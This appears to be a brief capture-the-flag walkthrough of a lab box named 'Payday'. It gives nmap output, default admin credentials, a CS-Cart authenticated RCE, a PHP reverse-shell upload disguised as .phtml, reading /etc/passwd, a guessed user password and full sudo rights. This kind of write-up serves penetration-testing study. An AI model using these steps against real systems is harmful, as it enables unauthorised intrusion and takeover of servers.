Payday
Enumeration
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
Default credentials - admin:admin
CS-Cart 1.3.3 - authenticated RCE
https://www.exploit-db.com/exploits/48891
get PHP shells from http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!
Initial Access
Visited and got reverse shell - https://192.168.117.39/skins/shell.phtml
PrivEsc
$ cat /etc/passwd
...
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
Brute force with rockyou or try simple thinking :)
patrick:patrick
sudo -l
(ALL) ALL
Last updated